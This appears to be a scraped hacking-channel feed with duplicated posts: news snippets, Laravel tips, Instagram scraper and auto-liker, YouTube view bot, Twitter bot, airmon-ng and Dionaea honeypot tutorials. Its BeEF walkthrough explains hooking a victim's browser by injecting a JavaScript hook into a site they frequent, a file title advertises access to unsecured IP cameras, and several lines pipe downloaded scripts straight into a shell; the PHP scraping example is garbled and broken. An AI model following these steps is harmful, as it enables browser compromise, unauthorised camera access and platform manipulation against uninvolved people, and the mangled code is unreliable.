Forwarded from UNDERCODE NEWS
On the morning of 28 August, the share price of Xiaomi Group increased by more than 10.7 percent at 23.65
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WITH BEEF KALI-PARROT
1) The BeEF Framework
A Linux OS such as Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg OS is required to install BeEF on your local machine.
Although BeEF comes pre-installed in various pen-testing operating systems, it might be possible that it is not installed in your case. To check if whether BeEF is installed, look for BeEF in your Kali Linux directory. To do so, go to applications>Kali Linux>System Services>beef start.
2) Alternatively, you can fire up BeEF from a new terminal emulator by entering the following code:
$ cd /usr/share/beef-xss
$ cd ./beef
3) To install BeEF on your Kali Linux machine, open the command interface and type in the following command:
$ sudo apt-get update
$ sudo apt-get install beef-xss
4) BeEF should now be installed under /usr/share/beef-xss.
You can start using BeEF using the address described previously in this section.
Β» Welcome to BeEF
5) Now, you can see the BeEF GUI in its full glory. Access the BeEF server by launching your web browser and looking up the localhost (127.0.0.1).
6) You can access the BeEF web GUI by typing the following URL in your web browser:
http://localhost:3000/ui/authentication
7) The default user credentials, both the username and password, are βbeef:β
$ beef-xss-1
$ BeEF Login Web GUI
8) Now that you have logged into the BeEF web GUI, proceed to the βHooked Browsersβ section. Online Browsers and Offline Browsers. This section shows the victimβs hooked status.
Using BeEF
This walkthrough will demonstrate how to use BeEF in your local network using the localhost.
9) For the connections to be made outside the network, we will need to open ports and forward them to the users waiting to connect. In this article, we will stick to our home network. We will discuss port forwarding in future articles.
10) Hooking a Browser
To get to the core of what BeEF is about, first, you will need to understand what a BeEF hook is. It is a JavaScript file, used to latch on to a targetβs browser to exploit it while acting as a C&C between it and the attacker. This is what is meant by a βhookβ in the context of using BeEF. Once a web browser is hooked by BeEF, you can proceed to inject further payloads and begin with post-exploitation.
To find your local IP address, you open a new terminal and enter the following:
$ sudo ifconfig
Follow the steps below to perform the attack:
11) To target a web browser, you will first need to identify a webpage that the victim to-be likes to visit often, and then attach a BeEF hook to it.
Deliver a javascript payload, preferably by including the javascript hook into the web pageβs header. The target browser will become hooked once they visit this site.
If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.
Also, there are several generic webpage templates they have made available for your use.
http://localhost:3000/demos/butcher/index.html
Powered by wiki
β verified
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WITH BEEF KALI-PARROT
1) The BeEF Framework
A Linux OS such as Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg OS is required to install BeEF on your local machine.
Although BeEF comes pre-installed in various pen-testing operating systems, it might be possible that it is not installed in your case. To check if whether BeEF is installed, look for BeEF in your Kali Linux directory. To do so, go to applications>Kali Linux>System Services>beef start.
2) Alternatively, you can fire up BeEF from a new terminal emulator by entering the following code:
$ cd /usr/share/beef-xss
$ cd ./beef
3) To install BeEF on your Kali Linux machine, open the command interface and type in the following command:
$ sudo apt-get update
$ sudo apt-get install beef-xss
4) BeEF should now be installed under /usr/share/beef-xss.
You can start using BeEF using the address described previously in this section.
Β» Welcome to BeEF
5) Now, you can see the BeEF GUI in its full glory. Access the BeEF server by launching your web browser and looking up the localhost (127.0.0.1).
6) You can access the BeEF web GUI by typing the following URL in your web browser:
http://localhost:3000/ui/authentication
7) The default user credentials, both the username and password, are βbeef:β
$ beef-xss-1
$ BeEF Login Web GUI
8) Now that you have logged into the BeEF web GUI, proceed to the βHooked Browsersβ section. Online Browsers and Offline Browsers. This section shows the victimβs hooked status.
Using BeEF
This walkthrough will demonstrate how to use BeEF in your local network using the localhost.
9) For the connections to be made outside the network, we will need to open ports and forward them to the users waiting to connect. In this article, we will stick to our home network. We will discuss port forwarding in future articles.
10) Hooking a Browser
To get to the core of what BeEF is about, first, you will need to understand what a BeEF hook is. It is a JavaScript file, used to latch on to a targetβs browser to exploit it while acting as a C&C between it and the attacker. This is what is meant by a βhookβ in the context of using BeEF. Once a web browser is hooked by BeEF, you can proceed to inject further payloads and begin with post-exploitation.
To find your local IP address, you open a new terminal and enter the following:
$ sudo ifconfig
Follow the steps below to perform the attack:
11) To target a web browser, you will first need to identify a webpage that the victim to-be likes to visit often, and then attach a BeEF hook to it.
Deliver a javascript payload, preferably by including the javascript hook into the web pageβs header. The target browser will become hooked once they visit this site.
If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.
Also, there are several generic webpage templates they have made available for your use.
http://localhost:3000/demos/butcher/index.html
Powered by wiki
β verified
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#fasttips Changing Your Authentication Model :
Β» > Problem
You need the change the authentication model from the default User.
Your application is using namespaces or you want to use a differently named model for users.
Β» > Solution
Edit app/config/auth.php to change the model.
'model' => 'MyApp\Models\User',
Discussion
Donβt forget the required interfaces.
π¦If youβre using your own model itβs important that your model implements Authβs UserInterface. If youβre implementing the password reminder feature it should also implement RemindableInterface.
<?php namespace MyApp\Models;
use Illuminate\Auth\UserInterface;
use Illuminate\Auth\Reminders\RemindableInterface;
class User extends \Eloquent implements UserInterface, RemindableInterface
{
...
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#fasttips Changing Your Authentication Model :
Β» > Problem
You need the change the authentication model from the default User.
Your application is using namespaces or you want to use a differently named model for users.
Β» > Solution
Edit app/config/auth.php to change the model.
'model' => 'MyApp\Models\User',
Discussion
Donβt forget the required interfaces.
π¦If youβre using your own model itβs important that your model implements Authβs UserInterface. If youβre implementing the password reminder feature it should also implement RemindableInterface.
<?php namespace MyApp\Models;
use Illuminate\Auth\UserInterface;
use Illuminate\Auth\Reminders\RemindableInterface;
class User extends \Eloquent implements UserInterface, RemindableInterface
{
...
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Why should a "supermarket" buy TikTok, why should the old brand also do social e-commerce #international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Methode 2020 for Get Instagram posts/profile/hashtag data without using Instagram API. crawler.py
Like posts automatically. liker.py
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Make sure you have Chrome browser installed.
2) Download chromedriver and put it into bin folder: ./inscrawler/bin/chromedriver
> https://sites.google.com/a/chromium.org/chromedriver/
3) Install Selenium: pip3 install -r requirements.txt
4) cp inscrawler/secret.py.dist inscrawler/secret.py
E X A M P L E S :
python crawler.py posts_full -u cal_foodie -n 100 -o ./output
python crawler.py posts_full -u cal_foodie -n 10 --fetch_likers --fetch_likes_plays
python crawler.py posts_full -u cal_foodie -n 10 --fetch_comments
python crawler.py profile -u cal_foodie -o ./output
python crawler.py hashtag -t taiwan -o ./output
python crawler.py hashtag -t taiwan -o ./output --fetch_details
python crawler.py posts -u cal_foodie -n 100 -o ./output # deprecated
π¦ MORE USAGE :
1) Choose mode posts, you will get url, caption, first photo for each post; choose mode posts_full, you will get url, caption, all photos, time, comments, number of likes and views for each posts. Mode posts_full will take way longer than mode posts. [posts is deprecated.
2) For the recent posts, there is no quick way to get the post caption]
3) Return default 100 hashtag posts(mode: hashtag) and all user's posts(mode: posts) if not specifying the number of post -n, --number.
4) Print the result to the console if not specifying the output path of post -o, --output.
5) It takes much longer to get data if the post number is over about 1000 since Instagram has set up the rate limit for data request.
6) Don't use this repo crawler Instagram if the user has more than 10000 posts.
enjoyβ€οΈππ»
β git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Methode 2020 for Get Instagram posts/profile/hashtag data without using Instagram API. crawler.py
Like posts automatically. liker.py
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Make sure you have Chrome browser installed.
2) Download chromedriver and put it into bin folder: ./inscrawler/bin/chromedriver
> https://sites.google.com/a/chromium.org/chromedriver/
3) Install Selenium: pip3 install -r requirements.txt
4) cp inscrawler/secret.py.dist inscrawler/secret.py
E X A M P L E S :
python crawler.py posts_full -u cal_foodie -n 100 -o ./output
python crawler.py posts_full -u cal_foodie -n 10 --fetch_likers --fetch_likes_plays
python crawler.py posts_full -u cal_foodie -n 10 --fetch_comments
python crawler.py profile -u cal_foodie -o ./output
python crawler.py hashtag -t taiwan -o ./output
python crawler.py hashtag -t taiwan -o ./output --fetch_details
python crawler.py posts -u cal_foodie -n 100 -o ./output # deprecated
π¦ MORE USAGE :
1) Choose mode posts, you will get url, caption, first photo for each post; choose mode posts_full, you will get url, caption, all photos, time, comments, number of likes and views for each posts. Mode posts_full will take way longer than mode posts. [posts is deprecated.
2) For the recent posts, there is no quick way to get the post caption]
3) Return default 100 hashtag posts(mode: hashtag) and all user's posts(mode: posts) if not specifying the number of post -n, --number.
4) Print the result to the console if not specifying the output path of post -o, --output.
5) It takes much longer to get data if the post number is over about 1000 since Instagram has set up the rate limit for data request.
6) Don't use this repo crawler Instagram if the user has more than 10000 posts.
enjoyβ€οΈππ»
β git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
The US 5G network speed lags behind the world: the average downlink is only 50.9Mb/s
#technologie
#technologie
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦youtube-bot topic 2020 :
(views)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Run following commands in the terminal:
1) curl -fs https://gitlab.com/DeBos/mpt/raw/master/mpt.sh
> sh -s install "git python"
2) git clone https://gitlab.com/DeBos/ytviewer.git
3) cd ytviewer
4) make
then
Run following command in the command prompt or the terminal:
5) python main.py [-h] [-u URL|FILE] [-p N] [-B firefox|chrome] [-P FILE] [-R REFERER|FILE] [-U USER_AGENT|FILE
for more usage visit https://github.com/DeBos99/ytviewer#usage
enjoyβ€οΈππ»
β git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦youtube-bot topic 2020 :
(views)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Run following commands in the terminal:
1) curl -fs https://gitlab.com/DeBos/mpt/raw/master/mpt.sh
> sh -s install "git python"
2) git clone https://gitlab.com/DeBos/ytviewer.git
3) cd ytviewer
4) make
then
Run following command in the command prompt or the terminal:
5) python main.py [-h] [-u URL|FILE] [-p N] [-B firefox|chrome] [-P FILE] [-R REFERER|FILE] [-U USER_AGENT|FILE
for more usage visit https://github.com/DeBos99/ytviewer#usage
enjoyβ€οΈππ»
β git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#Fasttips Finding Files Matching a Pattern :
Use the File::glob() method.
$log_files = File::glob('/test/*.log');
if ($log_files === false)
{
die("An error occurred.");
}
You can also pass flags to the method.
$dir_list = File::glob('/test/*', GLOB_ONLYDIR);
if ($dir_files === false)
{
die("An error occurred.");
}
Valid flags are:
GLOB_MARK β Adds a slash to each directory returned
GLOB_NOSORT β Return files as they appear in the directory (no sorting)
GLOB_NOCHECK β Return the search pattern if no files matching it were found
GLOB_NOESCAPE β Backslashes do not quote meta-characters
GLOB_BRACE β Expands {a,b,c} to match βaβ, βbβ, or βcβ
GLOB_ONLYDIR β Return only directory entries which match the pattern
GLOB_ERR β Stop on read errors (like unreadable directories), by default errors are ignored.
Returns an empty array if no files are matched or a false on error.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#Fasttips Finding Files Matching a Pattern :
Use the File::glob() method.
$log_files = File::glob('/test/*.log');
if ($log_files === false)
{
die("An error occurred.");
}
You can also pass flags to the method.
$dir_list = File::glob('/test/*', GLOB_ONLYDIR);
if ($dir_files === false)
{
die("An error occurred.");
}
Valid flags are:
GLOB_MARK β Adds a slash to each directory returned
GLOB_NOSORT β Return files as they appear in the directory (no sorting)
GLOB_NOCHECK β Return the search pattern if no files matching it were found
GLOB_NOESCAPE β Backslashes do not quote meta-characters
GLOB_BRACE β Expands {a,b,c} to match βaβ, βbβ, or βcβ
GLOB_ONLYDIR β Return only directory entries which match the pattern
GLOB_ERR β Stop on read errors (like unreadable directories), by default errors are ignored.
Returns an empty array if no files are matched or a false on error.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Crawl and analyze a fileCrawl and analyze a file :
crawl and analyze a file is very simple. This tutorial will lead you step by step to implement it through an example. let's start!
1) First of all, we must first decide the URL address we will crawl. It can be set in the script or passed through $QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$url = 'http://www.php.net' ;
?> In the
second step, we grab the specified file and store it in an array through the file() function.
<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
?>
2) Okay, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $lines_array into a string. We can use the implode(x,y) function to achieve it. If you want to use explode (array of string variables) later, it may be better to set x to "|" or "!" or other similar separators. But for our purposes, it is best to set x to a space. y is another necessary parameter because it is the array you want to process with implode().
<?
$url = 'http:;
$lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
?>
3) Now, the crawling work is finished, and itβs time to analyze it. For the purpose of this example, we want to get everything between <head> and </head>. In order to analyze the string, we also need something called a regular expression.
<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
eregi ( "<head>(.*)</ head>" , $lines_string ,$head );
?>
4) Let's take a look at the code. As you can see, the eregi() function is executed in the following format:
eregi("<head>(.*)</head>", $lines_string, $head);
"(.*)" means everything and can be explained For, "Analyze everything between <head> and </head>". $lines_string is the string we are analyzing, and $head is the array where the analysis result is stored.
5) Finally, we can input data. Because there is only one instance between <head> and </head>, we can safely assume that there is only one element in the array, and it is what we want. Let's print it out.
<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
eregi ( "<head>(.*)</ head>" ,);
echo $head [ 0 ];
?>
6) This is all the code.
<?php
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
preg_match_all ( "/<body([^>] .+?)>(.*)<\/body>/is" , $lines_string , $m );
echo "<xmp>" ;
echo $m [ 2 ][ 0 ];
?>
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Crawl and analyze a fileCrawl and analyze a file :
crawl and analyze a file is very simple. This tutorial will lead you step by step to implement it through an example. let's start!
1) First of all, we must first decide the URL address we will crawl. It can be set in the script or passed through $QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$url = 'http://www.php.net' ;
?> In the
second step, we grab the specified file and store it in an array through the file() function.
<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
?>
2) Okay, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $lines_array into a string. We can use the implode(x,y) function to achieve it. If you want to use explode (array of string variables) later, it may be better to set x to "|" or "!" or other similar separators. But for our purposes, it is best to set x to a space. y is another necessary parameter because it is the array you want to process with implode().
<?
$url = 'http:;
$lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
?>
3) Now, the crawling work is finished, and itβs time to analyze it. For the purpose of this example, we want to get everything between <head> and </head>. In order to analyze the string, we also need something called a regular expression.
<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
eregi ( "<head>(.*)</ head>" , $lines_string ,$head );
?>
4) Let's take a look at the code. As you can see, the eregi() function is executed in the following format:
eregi("<head>(.*)</head>", $lines_string, $head);
"(.*)" means everything and can be explained For, "Analyze everything between <head> and </head>". $lines_string is the string we are analyzing, and $head is the array where the analysis result is stored.
5) Finally, we can input data. Because there is only one instance between <head> and </head>, we can safely assume that there is only one element in the array, and it is what we want. Let's print it out.
<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
eregi ( "<head>(.*)</ head>" ,);
echo $head [ 0 ];
?>
6) This is all the code.
<?php
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
preg_match_all ( "/<body([^>] .+?)>(.*)<\/body>/is" , $lines_string , $m );
echo "<xmp>" ;
echo $m [ 2 ][ 0 ];
?>
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Using Powershell to programmatically run nmap scans.pdf
252 KB
The resulting script could only be described as a quick hack, about ten lines of PowerShell to read a text le and iterate over each line, running the required nmap command and checking to make sure that the XML le actually saved.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FULL AIRMON-NG TUTORIAL :
(KALI-PARROT-UBUNTU...)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FULL AIRMON-NG TUTORIAL :
(KALI-PARROT-UBUNTU...)
wireless cards to turn on monitor mode:enjoyβ€οΈππ»
For this purpose, we will use the POSIX sh script specifically designed to carry out this function:
$ sudo airmon-ng --help
$usage: airmon-ng <start|stop|check> <interface> [channel or frequency]
See the interfaceβs status
To view the interfaceβs status, type the following command into the terminal:
$ sudo airmon-ng
Kill background processes
Use the following syntax to check if any program is running in the background
$ sudo airmon-ng check
You can also terminate any process that you think is interfering with airmon_ng or taking up memory using:
$ sudo airmon-ng check kill
How to enable Monitor Mode using Airmon-ng
If you have tried enabling monitor mode by using iw and failed, then the good idea is to try to enable monitor mode by using a different method.
The first step is to get the information about your wireless interface
$ sudo airmon-ng
Of course, you would like to kill any process that can interfere with using the adapter in monitor mode. To do that, you can use a program called airmon-ng or else use the following command.
$ sudo airmon-ng check
$ sudo airmon-ng check kill
Now we can enable the Monitor Mode without any interference.
$ sudo airmon-ng start wlan0
Wlan0mon is created.
$ sudo iwconfig
Now, you can use the following commands to disable the monitor mode and return to the managed mode.
$ sudo airmon-ng stop wlan0mon
Follow the command to restart the network manager.
$ sudo systemctl start NetworkManager
How to turn off the NetworkManager that prevents Monitor Mode
$ sudo systemctl stop NetworkManager
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#requested How to Add a New Column to Existing Table in a Migration ?
I've had problems I couldn't connect a new section to my users list. Can't seem to understand it.
I tried to edit the migration file usingβ¦
<?php
public function up()
{
Schema::create('users', function ($table) {
$table->integer("paid");
});
}
In terminal, I execute php artisan migrate:install and migrate.
π¦How do I add new columns?
Solution :
You cannot update any migrations that have been migrated already. If it is added to the migrations table already, it wont process it again. Your solution is to create a new migration, for which you may use the migrate:make command on the Artisan CLI. Use a specific name to avoid clashing with existing models
1) for Laravel 5+:
php artisan make:migration addpaidtouserstable --table=users
You will be using the Schema::table() method (since youβre accessing the existing table, and not creating a new one). And you can add a column like this:
public function up()
{
Schema::table('users', function($table) {
$table->integer('paid');
});
}
2) and donβt forget to add the rollback option:
public function down()
{
Schema::table('users', function($table) {
$table->dropColumn('paid');
});
}
3) Then you can run your migrations:
> php artisan migrate
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#requested How to Add a New Column to Existing Table in a Migration ?
I've had problems I couldn't connect a new section to my users list. Can't seem to understand it.
I tried to edit the migration file usingβ¦
<?php
public function up()
{
Schema::create('users', function ($table) {
$table->integer("paid");
});
}
In terminal, I execute php artisan migrate:install and migrate.
π¦How do I add new columns?
Solution :
You cannot update any migrations that have been migrated already. If it is added to the migrations table already, it wont process it again. Your solution is to create a new migration, for which you may use the migrate:make command on the Artisan CLI. Use a specific name to avoid clashing with existing models
1) for Laravel 5+:
php artisan make:migration addpaidtouserstable --table=users
You will be using the Schema::table() method (since youβre accessing the existing table, and not creating a new one). And you can add a column like this:
public function up()
{
Schema::table('users', function($table) {
$table->integer('paid');
});
}
2) and donβt forget to add the rollback option:
public function down()
{
Schema::table('users', function($table) {
$table->dropColumn('paid');
});
}
3) Then you can run your migrations:
> php artisan migrate
β β β Uππ»βΊπ«Δπ¬πβ β β β
Gain access to unsecured IP cameras with these Google dorks.txt
1.4 KB
Gain access to unsecured IP cameras with these Google dorks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TwitterBOT :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½
Connecting to Twitter :
1) Register a Twitter account and also get its "app info".
Twitter doesn't allow you to register multiple twitter accounts on the same email address. I recommend you create a brand new email address (perhaps using Gmail) for the Twitter account. Once you register the account to that email address, wait for the confirmation email.
2) Now go here and log in as the Twitter account for your bot:
3) Fill up the form and submit.
Next once the submission completes you will be taken to a page which has the
6) Now type the following in the command line in your project directory:
node bot.js
7) Hopefully at this point you see a message like "Success! Check your bot, it should have retweeted something." Ok it won't say that, you have to code that in. Its simple as
π π π½ :
1) git clone https://github.com/nisrulz/twitterbot-nodejs.git
2) Run
npm install
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TwitterBOT :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½
Connecting to Twitter :
1) Register a Twitter account and also get its "app info".
Twitter doesn't allow you to register multiple twitter accounts on the same email address. I recommend you create a brand new email address (perhaps using Gmail) for the Twitter account. Once you register the account to that email address, wait for the confirmation email.
2) Now go here and log in as the Twitter account for your bot:
3) Fill up the form and submit.
Next once the submission completes you will be taken to a page which has the
tab : Update details here4) Use the generated tokens in the "Key and Access Token" tab to fill the fields under the config.js file in your app directory. It should look like this:
"Permissons" tab : Enable Read and Write
"Key and Access Token" tab : Click on Create my access token.
= {
consumer_key: 'blah',
consumer_secret: 'blah',
access_token: 'blah',
access_token_secret: 'blah'
}
5) Update the code under bot.js , with the your values. Best of all modify the code, tinker with it.6) Now type the following in the command line in your project directory:
node bot.js
7) Hopefully at this point you see a message like "Success! Check your bot, it should have retweeted something." Ok it won't say that, you have to code that in. Its simple as
Check your bot, it should have retweeted something.");8) Check the Twitter account for your bot, and it should have retweeted a tweet with the provided hashtag.
π π π½ :
1) git clone https://github.com/nisrulz/twitterbot-nodejs.git
2) Run
npm install
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nisrulz/twitterbot-nodejs: [Bot] A twitter bot made using nodejs which can post tweets, retweet other tweets and possiblyβ¦
[Bot] A twitter bot made using nodejs which can post tweets, retweet other tweets and possibly fav tweets - nisrulz/twitterbot-nodejs
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ZERO-DAY TUTORIAL :
Libemu is a library used for the detection of shellcode and x86 emulation. Libemu can draw malware inside the documents such as RTF, PDF, etc. we can use that for hostile behavior by using heuristics. This is an advanced form of a honeypot, and beginners should not try it. Dionaea is unsafe if it gets compromised by a hacker your whole system will get compromised and for this purpose, the lean install should be used, Debian and Ubuntu system are preferred.
I recommend not to use it on a system that will be used for other purposes as libraries and codes will get installed by us that may damage other parts of your system. Dionaea, on the other hand, is unsafe if it gets compromised your whole system will get compromised. For this purpose, the lean install should be used; Debian and Ubuntu systems are preferred.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Install dependencies:
Dionaea is a composite software, and many dependencies are required by it that are not installed on other systems like Ubuntu and Debian. So we will have to install dependencies before installing Dionaea, and it can be a dull task.
For example, we need to download the following packages to begin.
1) $ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev
2) libreadline-dev libsqlite3-dev python-dev libtool automake autoconf
3) build-essential subversion git-core flex bison pkg-config libnl-3-dev
4) libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
A script by Andrew Michael Smith can be downloaded from Github using wget.
5) When this script is downloaded, it will install applications (SQlite) and dependencies, download and configure Dionaea then.
6) $ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/
master/setup.bash -O /tmp/setup.bash && bash /tmp/setup.bash
7) Choose an interface:
Dionaea will configure itself, and it will ask you to select the network interface you want the honeypot to listen on after the dependencies and applications are downloaded.
8) Configuring Dionaea:
Now honeypot is all set and running. In future tutorials, I will show you how to identify the items of the attackers, how to set up Dionaea in real times of attack to alert you,
And how to look over and capture the shellcode of the attack. We will test our attack tools and Metasploit to check if we can capture malware before placing it live online.
9) Open the Dionaea configuration file:
Open the Dionaea configuration file in this step.
$ cd /etc/dionaea
10) Vim or any text editor other than this can work. Leafpad is used in this case.
$ sudo leafpad dionaea.conf
Configure logging:
In several cases, multiple gigabytes of a log file is seen. Log error priorities should be configured, and for this purpose, scroll down the logging section of a file.
11) Services:
Dionaea is set up to run https, http, FTP, TFTP, smb, epmap, sip, mssql, and mysql
Disable Http and https because hackers are not likely to get fooled by them, and they are not vulnerable. Leave the others because they are unsafe services and can be attacked easily by hackers.
12) Start dionaea to test:
We have to run dionaea to find our new configuration. We can do this by typing:
$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid
13) Now we can analyze and capture malware with the help of Dionaea as it is running successfully.
enjoyβ€οΈππ»
β Darkiwiki
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ZERO-DAY TUTORIAL :
Libemu is a library used for the detection of shellcode and x86 emulation. Libemu can draw malware inside the documents such as RTF, PDF, etc. we can use that for hostile behavior by using heuristics. This is an advanced form of a honeypot, and beginners should not try it. Dionaea is unsafe if it gets compromised by a hacker your whole system will get compromised and for this purpose, the lean install should be used, Debian and Ubuntu system are preferred.
I recommend not to use it on a system that will be used for other purposes as libraries and codes will get installed by us that may damage other parts of your system. Dionaea, on the other hand, is unsafe if it gets compromised your whole system will get compromised. For this purpose, the lean install should be used; Debian and Ubuntu systems are preferred.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Install dependencies:
Dionaea is a composite software, and many dependencies are required by it that are not installed on other systems like Ubuntu and Debian. So we will have to install dependencies before installing Dionaea, and it can be a dull task.
For example, we need to download the following packages to begin.
1) $ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev
2) libreadline-dev libsqlite3-dev python-dev libtool automake autoconf
3) build-essential subversion git-core flex bison pkg-config libnl-3-dev
4) libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
A script by Andrew Michael Smith can be downloaded from Github using wget.
5) When this script is downloaded, it will install applications (SQlite) and dependencies, download and configure Dionaea then.
6) $ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/
master/setup.bash -O /tmp/setup.bash && bash /tmp/setup.bash
7) Choose an interface:
Dionaea will configure itself, and it will ask you to select the network interface you want the honeypot to listen on after the dependencies and applications are downloaded.
8) Configuring Dionaea:
Now honeypot is all set and running. In future tutorials, I will show you how to identify the items of the attackers, how to set up Dionaea in real times of attack to alert you,
And how to look over and capture the shellcode of the attack. We will test our attack tools and Metasploit to check if we can capture malware before placing it live online.
9) Open the Dionaea configuration file:
Open the Dionaea configuration file in this step.
$ cd /etc/dionaea
10) Vim or any text editor other than this can work. Leafpad is used in this case.
$ sudo leafpad dionaea.conf
Configure logging:
In several cases, multiple gigabytes of a log file is seen. Log error priorities should be configured, and for this purpose, scroll down the logging section of a file.
11) Services:
Dionaea is set up to run https, http, FTP, TFTP, smb, epmap, sip, mssql, and mysql
Disable Http and https because hackers are not likely to get fooled by them, and they are not vulnerable. Leave the others because they are unsafe services and can be attacked easily by hackers.
12) Start dionaea to test:
We have to run dionaea to find our new configuration. We can do this by typing:
$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid
13) Now we can analyze and capture malware with the help of Dionaea as it is running successfully.
enjoyβ€οΈππ»
β Darkiwiki
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β